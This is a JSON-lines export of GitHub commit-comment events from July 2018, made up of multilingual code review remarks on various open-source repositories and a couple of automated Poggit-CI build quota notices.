{"id":"7944138445","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MGARace"},"payload":{"comment":{"id":29657457,"position":null,"line":null,"path":null,"commit_id":"4331a5c3e114bda15c242f2b35143ecc7a8a7d72","created_at":"2018-07-10T14:20:36Z","updated_at":"2018-07-10T14:20:36Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MGARace/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `68bc755a-844c-11e8-9025-18f9b58c52b6`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T14:20:36Z"}
{"id":"7944140097","type":"CommitCommentEvent","actor":{"login":"shadyysf"},"repo":{"name":"alepauly/vsts-dotnet-samples"},"payload":{"comment":{"id":29657461,"position":96,"line":91,"path":"ClientLibrary/Snippets/Microsoft.TeamServices.Samples.Client/Git/RefsSample.cs","commit_id":"4744ea900d0bd1004c75506e897babe4b68db94b","created_at":"2018-07-10T14:20:52Z","updated_at":"2018-07-10T14:20:52Z","author_association":"NONE","body":"Makes sense, especially that we're not capturing the result of unlock here."}},"created_at":"2018-07-10T14:20:52Z"}
{"id":"7944141390","type":"CommitCommentEvent","actor":{"login":"tmirmota"},"repo":{"name":"tmirmota/reactvancouver"},"payload":{"comment":{"id":29657464,"position":27,"line":26,"path":"src/components/Speaker.js","commit_id":"383b667da75ba498a1f2b4d5a38c09553d90833c","created_at":"2018-07-10T14:21:03Z","updated_at":"2018-07-10T14:21:03Z","author_association":"OWNER","body":"can't this just become`{company && ` at ${company}`}`"}},"created_at":"2018-07-10T14:21:03Z"}
{"id":"7944141698","type":"CommitCommentEvent","actor":{"login":"VonLatvala"},"repo":{"name":"jenkinsci/performance-plugin"},"payload":{"comment":{"id":29657465,"position":null,"line":null,"path":null,"commit_id":"9b38268c10c1642c753e7a9a2b3216e4336db496","created_at":"2018-07-10T14:21:07Z","updated_at":"2018-07-10T14:21:07Z","author_association":"NONE","body":"Allright, let me do that...."}},"created_at":"2018-07-10T14:21:07Z"}
{"id":"7944147481","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-jissyusei1/meikai_java_2017_02_shida"},"payload":{"comment":{"id":29657474,"position":55,"line":55,"path":"jissyu/src/ensyuu15/En15_6_CommandLine.java","commit_id":"f544701ae2dcd38edb24b4827021e179852aa7e6","created_at":"2018-07-10T14:21:57Z","updated_at":"2018-07-10T14:21:57Z","author_association":"COLLABORATOR","body":"このパラメータが何を表すのかを記述しましょう"}},"created_at":"2018-07-10T14:21:57Z"}
{"id":"7944148170","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29657478,"position":29,"line":145,"path":"themes/survey/vanilla/scripts/ajaxify.js","commit_id":"d40dae716d5d7a58623a8ad334fd17625b8183a7","created_at":"2018-07-10T14:22:03Z","updated_at":"2018-07-10T14:22:03Z","author_association":"COLLABORATOR","body":"the file upload must not be a type=submit … and currently it's a link …\r\n\r\nAnd about IE11 : it's a jquery selector here, using css if able, and hack it if not …\r\n\r\nIf you find a real issue : please report it , but again : some feature deleted without real good reason … "}},"created_at":"2018-07-10T14:22:03Z"}
{"id":"7944149431","type":"CommitCommentEvent","actor":{"login":"sledorze"},"repo":{"name":"gcanti/fp-ts"},"payload":{"comment":{"id":29657482,"position":8,"line":485,"path":"src/Array.ts","commit_id":"3d6f6f72cc6d7e7bc8c058e0d70cd4a1883ae1e8","created_at":"2018-07-10T14:22:14Z","updated_at":"2018-07-10T14:22:14Z","author_association":"COLLABORATOR","body":"As you can imagine, the problem spans on all similar usages."}},"created_at":"2018-07-10T14:22:14Z"}
{"id":"7944151656","type":"CommitCommentEvent","actor":{"login":"MArclMG"},"repo":{"name":"MArclMG/hello-world"},"payload":{"comment":{"id":29657489,"position":1,"line":1,"path":"README.md","commit_id":"eca930d0f5bd0de61c91faed4fb3615fc5f7fd92","created_at":"2018-07-10T14:22:32Z","updated_at":"2018-07-10T14:22:32Z","author_association":"OWNER","body":"git branch -d branch"}},"created_at":"2018-07-10T14:22:32Z"}
{"id":"7944152271","type":"CommitCommentEvent","actor":{"login":"IanWONeill"},"repo":{"name":"devinfrench/explv-map"},"payload":{"comment":{"id":29657491,"position":null,"line":null,"path":null,"commit_id":"0115739818d0de11b2041797711fdf4eb65a36b7","created_at":"2018-07-10T14:22:38Z","updated_at":"2018-07-10T14:22:38Z","author_association":"NONE","body":"Whats different from the Explv version to the TriBot version? Are you looking to add other features??"}},"created_at":"2018-07-10T14:22:38Z"}
{"id":"7944154191","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-jissyusei1/meikai_java_2017_02_shida"},"payload":{"comment":{"id":29657498,"position":13,"line":13,"path":"jissyu/src/ensyuu15/En15_7_SumOfArgs.java","commit_id":"bcfdd435c2e11c2a6109e8cf4192fa28db23ea09","created_at":"2018-07-10T14:22:55Z","updated_at":"2018-07-10T14:22:55Z","author_association":"COLLABORATOR","body":"コメントが漏れてるため記述をお願いします。\r\n佐藤"}},"created_at":"2018-07-10T14:22:55Z"}
{"id":"7944155563","type":"CommitCommentEvent","actor":{"login":"jcesarmobile"},"repo":{"name":"ionic-team/capacitor"},"payload":{"comment":{"id":29657501,"position":13,"line":46,"path":"cli/src/android/update.ts","commit_id":"c59fe3722f556a9745fb549964370227bbd0220f","created_at":"2018-07-10T14:23:08Z","updated_at":"2018-07-10T14:23:08Z","author_association":"MEMBER","body":"The switch should be on `e`, not on `id`.\r\n\r\nAnyway, as they will only appear once, I think it's better a simple replace than using this function with the switch. "}},"created_at":"2018-07-10T14:23:08Z"}
{"id":"7944155791","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-jissyusei1/meikai_java_2017_02_shida"},"payload":{"comment":{"id":29657502,"position":null,"line":null,"path":null,"commit_id":"bcfdd435c2e11c2a6109e8cf4192fa28db23ea09","created_at":"2018-07-10T14:23:10Z","updated_at":"2018-07-10T14:23:10Z","author_association":"COLLABORATOR","body":"コメントが漏れてる箇所を確認してみてください\r\n佐藤"}},"created_at":"2018-07-10T14:23:10Z"}
{"id":"7944158146","type":"CommitCommentEvent","actor":{"login":"imnotkind"},"repo":{"name":"PLUS-POSTECH/study.plus.or.kr"},"payload":{"comment":{"id":29657507,"position":null,"line":null,"path":null,"commit_id":"4f365dd2f1e45ae763c295839ce3d9e2238bd64f","created_at":"2018-07-10T14:23:30Z","updated_at":"2018-07-10T14:23:30Z","author_association":"NONE","body":"question ask modal을 다른 html으로 빼냈으면 더 나았을듯?"}},"created_at":"2018-07-10T14:23:30Z"}
{"id":"7944162417","type":"CommitCommentEvent","actor":{"login":"tmirmota"},"repo":{"name":"tmirmota/reactvancouver"},"payload":{"comment":{"id":29657509,"position":37,"line":46,"path":"src/components/Speaker.js","commit_id":"3a9b9d7b0789c922e885d582fbe919ff4a212935","created_at":"2018-07-10T14:24:07Z","updated_at":"2018-07-10T14:24:07Z","author_association":"OWNER","body":"These heights should be set using RVGrid with a new grid style. We can't predict the size of each piece of content"}},"created_at":"2018-07-10T14:24:07Z"}
{"id":"7944162612","type":"CommitCommentEvent","actor":{"login":"amarp-synerzip"},"repo":{"name":"priyankap-synerzip/MealsPlusAutomation"},"payload":{"comment":{"id":29657512,"position":3,"line":9,"path":"src/main/resources/locators/dashboardPage.yml","commit_id":"1b9639f9113b5793856399d063f671553df3908f","created_at":"2018-07-10T14:24:08Z","updated_at":"2018-07-10T14:24:08Z","author_association":"COLLABORATOR","body":"remove empty lines"}},"created_at":"2018-07-10T14:24:08Z"}
{"id":"7944163136","type":"CommitCommentEvent","actor":{"login":"imnotkind"},"repo":{"name":"PLUS-POSTECH/study.plus.or.kr"},"payload":{"comment":{"id":29657516,"position":null,"line":null,"path":null,"commit_id":"4f365dd2f1e45ae763c295839ce3d9e2238bd64f","created_at":"2018-07-10T14:24:13Z","updated_at":"2018-07-10T14:24:13Z","author_association":"NONE","body":"views.py의 already_authed 오타 고쳤습니다"}},"created_at":"2018-07-10T14:24:13Z"}
{"id":"7944164994","type":"CommitCommentEvent","actor":{"login":"lonoak"},"repo":{"name":"rediris-es/simplesamlphp-module-idpinstaller"},"payload":{"comment":{"id":29657527,"position":null,"line":null,"path":null,"commit_id":"0945e6baddef9425b3ccca29a4100b066eaf64ad","created_at":"2018-07-10T14:24:28Z","updated_at":"2018-07-10T14:24:28Z","author_association":"CONTRIBUTOR","body":"Pon SHA512, usa el Salt que se genera más abajo, y elimina comentarios.\r\n\r\nPor lo demás, bien."}},"created_at":"2018-07-10T14:24:28Z"}
{"id":"7944166861","type":"CommitCommentEvent","actor":{"login":"antoinealb"},"repo":{"name":"cvra/robot-software"},"payload":{"comment":{"id":29657529,"position":null,"line":null,"path":null,"commit_id":"350f8e3df7b63258cc14f925262c74b203173619","created_at":"2018-07-10T14:24:44Z","updated_at":"2018-07-10T14:24:44Z","author_association":"MEMBER","body":"Does this fix the apparent crash when loosing packets ?"}},"created_at":"2018-07-10T14:24:44Z"}
{"id":"7944170285","type":"CommitCommentEvent","actor":{"login":"Corthell"},"repo":{"name":"Corthell/Own"},"payload":{"comment":{"id":29657533,"position":null,"line":null,"path":null,"commit_id":"0d148b3e450cfe9eb9151a5cdb0107a98223a185","created_at":"2018-07-10T14:25:14Z","updated_at":"2018-07-10T14:25:14Z","author_association":"OWNER","body":"Dodałem trzy modele aut... wydaje mi się, że najsławniejsze w swoich kategoriach."}},"created_at":"2018-07-10T14:25:14Z"}
{"id":"7944170936","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29657536,"position":22,"line":22,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T14:25:19Z","updated_at":"2018-07-10T14:25:19Z","author_association":"CONTRIBUTOR","body":"Do we have a link for this series?"}},"created_at":"2018-07-10T14:25:19Z"}
{"id":"7944172162","type":"CommitCommentEvent","actor":{"login":"amarp-synerzip"},"repo":{"name":"priyankap-synerzip/MealsPlusAutomation"},"payload":{"comment":{"id":29657542,"position":16,"line":29,"path":"src/test/java/TestCases/MealPaymentTest.java","commit_id":"1b9639f9113b5793856399d063f671553df3908f","created_at":"2018-07-10T14:25:30Z","updated_at":"2018-07-10T14:25:30Z","author_association":"COLLABORATOR","body":"do not use Thread.sleep and also remove unwanted/commented code.\r\n\r\nif you really need commented code for future reference then only keep it, else remove immediately while code commit."}},"created_at":"2018-07-10T14:25:30Z"}
{"id":"7944193482","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29657608,"position":1,"line":null,"path":"1531232915.11/github_test.txt","commit_id":"f60bc48e3c3023ac59e7c00dbf1b41f05785e372","created_at":"2018-07-10T14:28:37Z","updated_at":"2018-07-10T14:28:37Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-10T14:28:37Z"}
{"id":"7944195968","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29657611,"position":28,"line":24,"path":"src/main/java/com/agurova/services/impl/UnsplashStockImagesService.java","commit_id":"e714fddf8ec48bdc302536321f8b0adcac1a27b1","created_at":"2018-07-10T14:28:59Z","updated_at":"2018-07-10T14:28:59Z","author_association":"COLLABORATOR","body":"Статические неприватные переменные. Во имя каких целей такие нужны (нужны ли в данном случае вообще?)\r\nДля констант есть свои правила наименования (https://www.lar.ru/java-codestyle/). "}},"created_at":"2018-07-10T14:28:59Z"}
{"id":"7944199530","type":"CommitCommentEvent","actor":{"login":"gcanti"},"repo":{"name":"gcanti/fp-ts"},"payload":{"comment":{"id":29657625,"position":8,"line":485,"path":"src/Array.ts","commit_id":"3d6f6f72cc6d7e7bc8c058e0d70cd4a1883ae1e8","created_at":"2018-07-10T14:29:31Z","updated_at":"2018-07-10T14:29:31Z","author_association":"OWNER","body":"@sledorze thanks for the info. I wouldn't try to fix that behaviour though: either is a bug or is the intended behaviour (looks like a kind of unification) in ts 3.0\r\n"}},"created_at":"2018-07-10T14:29:31Z"}
{"id":"7944202779","type":"CommitCommentEvent","actor":{"login":"lonoak"},"repo":{"name":"rediris-es/simplesamlphp-module-idpinstaller"},"payload":{"comment":{"id":29657636,"position":null,"line":null,"path":null,"commit_id":"8b59e4354ddbc14606b1cbd8f85c28f8fa3da353","created_at":"2018-07-10T14:29:59Z","updated_at":"2018-07-10T14:29:59Z","author_association":"CONTRIBUTOR","body":"Debería darse opción a copiar al portapapeles. Déjame que me instale el nuevo código y te diga..."}},"created_at":"2018-07-10T14:29:59Z"}
{"id":"7944204411","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29657639,"position":36,"line":36,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T14:30:14Z","updated_at":"2018-07-10T14:30:14Z","author_association":"CONTRIBUTOR","body":"We usually write \"timeseries\" as one word, not two."}},"created_at":"2018-07-10T14:30:14Z"}
{"id":"7944208250","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29657645,"position":144,"line":125,"path":"src/main/java/com/agurova/services/impl/UnsplashStockImagesService.java","commit_id":"e714fddf8ec48bdc302536321f8b0adcac1a27b1","created_at":"2018-07-10T14:30:45Z","updated_at":"2018-07-10T14:30:45Z","author_association":"COLLABORATOR","body":"Имеет смысл вынести путь до файлика с настройками в константу в классе, а в методе эту константу использовать или передавать её в метод."}},"created_at":"2018-07-10T14:30:45Z"}
{"id":"7944210785","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtTamari/meikaijava"},"payload":{"comment":{"id":29657650,"position":32,"line":32,"path":"e_16/src/e_16_1/e_16_1.java","commit_id":"9714d042e43eb3275eb95f29a195b4aebd9f9080","created_at":"2018-07-10T14:31:08Z","updated_at":"2018-07-10T14:31:08Z","author_association":"COLLABORATOR","body":"課題文に記述がない場合（変数nを〇〇せよ、や、１の場合など）は定数での対応をするようにお願いします。"}},"created_at":"2018-07-10T14:31:08Z"}
{"id":"7944211625","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29657652,"position":147,"line":128,"path":"src/main/java/com/agurova/services/impl/UnsplashStockImagesService.java","commit_id":"e714fddf8ec48bdc302536321f8b0adcac1a27b1","created_at":"2018-07-10T14:31:14Z","updated_at":"2018-07-10T14:31:14Z","author_association":"COLLABORATOR","body":"Эмм??)"}},"created_at":"2018-07-10T14:31:14Z"}
{"id":"7944216324","type":"CommitCommentEvent","actor":{"login":"Onira1"},"repo":{"name":"Onira1/GeekBrains"},"payload":{"comment":{"id":29657656,"position":null,"line":null,"path":null,"commit_id":"972f5128f43da6ba39106cdfa19f475929fb5dcd","created_at":"2018-07-10T14:31:55Z","updated_at":"2018-07-10T14:31:55Z","author_association":"OWNER","body":"jhg"}},"created_at":"2018-07-10T14:31:55Z"}
{"id":"7944217654","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29657666,"position":3,"line":3,"path":"src/main/resources/unsplash.properties","commit_id":"e714fddf8ec48bdc302536321f8b0adcac1a27b1","created_at":"2018-07-10T14:32:08Z","updated_at":"2018-07-10T14:32:08Z","author_association":"COLLABORATOR","body":"Используй единый вариант наименования параметров конфигурации."}},"created_at":"2018-07-10T14:32:08Z"}
{"id":"7944220047","type":"CommitCommentEvent","actor":{"login":"bu1th4nh"},"repo":{"name":"bu1th4nh/bu1th4nh.github.io"},"payload":{"comment":{"id":29657674,"position":null,"line":null,"path":null,"commit_id":"b04749824b79b4a7b5072f6604907113b5ec40d4","created_at":"2018-07-10T14:32:28Z","updated_at":"2018-07-10T14:32:28Z","author_association":"OWNER","body":"Yes, the background image is (nearly) OK now."}},"created_at":"2018-07-10T14:32:28Z"}
{"id":"7944221732","type":"CommitCommentEvent","actor":{"login":"camalejao"},"repo":{"name":"Raksantos/Projeto-PWEB"},"payload":{"comment":{"id":29657676,"position":null,"line":null,"path":null,"commit_id":"af7ee360b57ff47632427a9c3d2403863204d74d","created_at":"2018-07-10T14:32:43Z","updated_at":"2018-07-10T14:32:43Z","author_association":"COLLABORATOR","body":"só queria que o texto ficasse formatado mas o workbench não vai com a minha cara"}},"created_at":"2018-07-10T14:32:43Z"}
{"id":"7944223325","type":"CommitCommentEvent","actor":{"login":"XxDog"},"repo":{"name":"DogBot22/CatBot"},"payload":{"comment":{"id":29657680,"position":1,"line":1,"path":"README.md","commit_id":"f7ad3b3b24f03701845cb68b6677e8f148418f54","created_at":"2018-07-10T14:32:57Z","updated_at":"2018-07-10T14:32:57Z","author_association":"NONE","body":"Hello"}},"created_at":"2018-07-10T14:32:57Z"}
{"id":"7944229584","type":"CommitCommentEvent","actor":{"login":"isaachier"},"repo":{"name":"sustrik/libmill"},"payload":{"comment":{"id":29657696,"position":null,"line":null,"path":null,"commit_id":"61322eaf794db1941b4ee1bc64836e3378ca06f0","created_at":"2018-07-10T14:33:55Z","updated_at":"2018-07-10T14:33:55Z","author_association":"CONTRIBUTOR","body":"@darix you definitely could add `SOVERSION`. I didn't see that property in the original and I didn't think to add it. I see your patch uses `1.18` for library version, but `${PROJECT_VERSION}` might be easier to maintain and expands to the same thing.\r\n\r\nRegarding the hard-coding of lib, the project I based this CMake build on recently made an update to do what you suggested (uses `GNUInstallDirs` instead). Maybe if I have time I can update with that patch."}},"created_at":"2018-07-10T14:33:55Z"}
{"id":"7944232525","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29657703,"position":39,"line":39,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T14:34:21Z","updated_at":"2018-07-10T14:34:21Z","author_association":"CONTRIBUTOR","body":"capitalize Agent"}},"created_at":"2018-07-10T14:34:21Z"}
{"id":"7944235544","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29657707,"position":40,"line":40,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T14:34:47Z","updated_at":"2018-07-10T14:34:47Z","author_association":"CONTRIBUTOR","body":"capitalize Agent"}},"created_at":"2018-07-10T14:34:47Z"}
{"id":"7944237952","type":"CommitCommentEvent","actor":{"login":"nextgenusfs"},"repo":{"name":"nextgenusfs/funannotate"},"payload":{"comment":{"id":29657712,"position":null,"line":null,"path":null,"commit_id":"687452c925a4f69dfee8c103a4bebe9474e073c4","created_at":"2018-07-10T14:35:09Z","updated_at":"2018-07-10T14:35:09Z","author_association":"OWNER","body":"This should help address #190"}},"created_at":"2018-07-10T14:35:09Z"}
{"id":"7944238928","type":"CommitCommentEvent","actor":{"login":"VonLatvala"},"repo":{"name":"jenkinsci/performance-plugin"},"payload":{"comment":{"id":29657713,"position":null,"line":null,"path":null,"commit_id":"9b38268c10c1642c753e7a9a2b3216e4336db496","created_at":"2018-07-10T14:35:16Z","updated_at":"2018-07-10T14:35:16Z","author_association":"NONE","body":"Built without errors\r\nPlatform: `Darwin HOSTNAME 17.5.0 Darwin Kernel Version 17.5.0: Fri Apr 13 19:32:32 PDT 2018; root:xnu-4570.51.2~1/RELEASE_X86_64 x86_64`\r\n`mvn --version`: \r\n`Apache Maven 3.5.3 (3383c37e1f9e9b3bc3df5050c29c8aff9f295297; 2018-02-24T21:49:05+02:00)\r\nMaven home: /usr/local/Cellar/maven/3.5.3/libexec\r\nJava version: 1.8.0_172, vendor: Oracle Corporation\r\nJava home: /Library/Java/JavaVirtualMachines/jdk1.8.0_172.jdk/Contents/Home/jre\r\nDefault locale: en_FI, platform encoding: UTF-8\r\nOS name: \"mac os x\", version: \"10.13.4\", arch: \"x86_64\", family: \"mac\"` \r\nPerformance.hpi in `./target/`:\r\n`MD5 (performance.hpi) = b4c1b3444a31504fa74b80158f352798`\r\n\r\nNeed anything else (is this what you expected?)"}},"created_at":"2018-07-10T14:35:16Z"}
{"id":"7944242239","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29657715,"position":4,"line":4,"path":"docs/rules.md","commit_id":"50c2d27271565804e1920507fa6fdebb0e4ee855","created_at":"2018-07-10T14:35:44Z","updated_at":"2018-07-10T14:35:44Z","author_association":"NONE","body":"Remove the word \"web\". The web is just an implementation detail. What you're documenting here is simply the game, the \"business domain\", not technical matters.\r\n\r\nThis is the document you can read out loud to a friend when sitting together at a table and playing tic-tac-toe for the first time.\r\n\r\nLater on you will decide whether you want your game to be web-delivered or somehow else.\r\n\r\nCorrect wording: \"The game is played by two different players.\""}},"created_at":"2018-07-10T14:35:44Z"}
{"id":"7944243171","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29657717,"position":44,"line":44,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T14:35:53Z","updated_at":"2018-07-10T14:35:53Z","author_association":"CONTRIBUTOR","body":"lowercase metadata, uppercase Agent"}},"created_at":"2018-07-10T14:35:53Z"}
{"id":"7944250932","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29657724,"position":48,"line":48,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T14:37:03Z","updated_at":"2018-07-10T14:37:03Z","author_association":"CONTRIBUTOR","body":"First sentence (\"Processes... working directory.\") needs a serial comma. Lowercase \"metadata.\""}},"created_at":"2018-07-10T14:37:03Z"}
{"id":"7944254139","type":"CommitCommentEvent","actor":{"login":"kraj"},"repo":{"name":"agherzan/meta-raspberrypi"},"payload":{"comment":{"id":29657729,"position":null,"line":null,"path":null,"commit_id":"e713c3f60d74fbb864122f8f11a80ca302d53da3","created_at":"2018-07-10T14:37:31Z","updated_at":"2018-07-10T14:37:31Z","author_association":"COLLABORATOR","body":"Yes we need to bring that in as well "}},"created_at":"2018-07-10T14:37:31Z"}
{"id":"7944255063","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29657732,"position":13,"line":13,"path":"docs/rules.md","commit_id":"50c2d27271565804e1920507fa6fdebb0e4ee855","created_at":"2018-07-10T14:37:39Z","updated_at":"2018-07-10T14:37:39Z","author_association":"NONE","body":"Rephrase using a real-life word, not \"displayed\". Displayed indicates the existence of a display, which is a technical term, not a business one. See comment above for the rationale."}},"created_at":"2018-07-10T14:37:39Z"}
{"id":"7944260461","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29657746,"position":null,"line":null,"path":null,"commit_id":"65ae8137653804235794a9acfb5854d999333a9e","created_at":"2018-07-10T14:38:28Z","updated_at":"2018-07-10T14:38:28Z","author_association":"NONE","body":"Now I finally know how these 5 `foo` ints work\r\n\r\nDidn't notice that `RIL_AppStatus` struct defined in `RIL_CardStatus` struct has its defined size"}},"created_at":"2018-07-10T14:38:28Z"}
{"id":"7944264320","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29657755,"position":73,"line":84,"path":"contracts/FundsSplitter.sol","commit_id":"af7e603c9ebd15fdfa0de8a238e3ba0a41346c0d","created_at":"2018-07-10T14:39:02Z","updated_at":"2018-07-10T14:39:02Z","author_association":"OWNER","body":"Acknowledge. I think I missed it out while working between Remix and VStudio. "}},"created_at":"2018-07-10T14:39:02Z"}
{"id":"7944266565","type":"CommitCommentEvent","actor":{"login":"dirn"},"repo":{"name":"PyGotham/papercall-api-import"},"payload":{"comment":{"id":29657760,"position":24,"line":136,"path":"papercall_import.py","commit_id":"bb1b57720f5d76c0bca514dff031841d76c71913","created_at":"2018-07-10T14:39:21Z","updated_at":"2018-07-10T14:39:21Z","author_association":"MEMBER","body":"This is a misleading name."}},"created_at":"2018-07-10T14:39:21Z"}
{"id":"7944269124","type":"CommitCommentEvent","actor":{"login":"ciotlosm"},"repo":{"name":"ciotlosm/custom-lovelace"},"payload":{"comment":{"id":29657772,"position":null,"line":null,"path":null,"commit_id":"f3ee169753b657515b2f642cd0bf48e83227702f","created_at":"2018-07-10T14:39:43Z","updated_at":"2018-07-10T14:39:43Z","author_association":"OWNER","body":"Sorry, I messed up the commit during a rebase "}},"created_at":"2018-07-10T14:39:43Z"}
{"id":"7944271936","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29657776,"position":null,"line":null,"path":null,"commit_id":"af7e603c9ebd15fdfa0de8a238e3ba0a41346c0d","created_at":"2018-07-10T14:40:08Z","updated_at":"2018-07-10T14:40:08Z","author_association":"OWNER","body":"Thanks @rob-Hitchens Appreciate your comments. I was wondering if the contract looks ok, can we move on to the Remittance comtract and start it's review. \r\n\r\nI tried incorporating lessons learned while writing FundsSplitter and will do one more revision today as well. Looking forward towards your review. Thanks again."}},"created_at":"2018-07-10T14:40:08Z"}
{"id":"7944274474","type":"CommitCommentEvent","actor":{"login":"dirn"},"repo":{"name":"PyGotham/papercall-api-import"},"payload":{"comment":{"id":29657782,"position":25,"line":137,"path":"papercall_import.py","commit_id":"bb1b57720f5d76c0bca514dff031841d76c71913","created_at":"2018-07-10T14:40:28Z","updated_at":"2018-07-10T14:40:28Z","author_association":"MEMBER","body":"As silly as this is, this is prone to race conditions. It's better to skip the `exists` check and just use `makedirs(talks_dir, exist_ok=True)`. The same below."}},"created_at":"2018-07-10T14:40:28Z"}
{"id":"7944274867","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MiniGameAPI"},"payload":{"comment":{"id":29657783,"position":null,"line":null,"path":null,"commit_id":"6b5ed5698fd97a53103e994c91eb563f7430add8","created_at":"2018-07-10T14:40:31Z","updated_at":"2018-07-10T14:40:31Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MiniGameAPI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `30e125ba-844f-11e8-81a3-6187a4979a07`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T14:40:31Z"}
{"id":"7944275132","type":"CommitCommentEvent","actor":{"login":"ningjing92"},"repo":{"name":"ningjing92/firstRemote"},"payload":{"comment":{"id":29657784,"position":null,"line":null,"path":null,"commit_id":"0bd0f256e7e9e222271c8095d4756644792dfcb0","created_at":"2018-07-10T14:40:33Z","updated_at":"2018-07-10T14:40:33Z","author_association":"OWNER","body":"创建第一个分支"}},"created_at":"2018-07-10T14:40:33Z"}
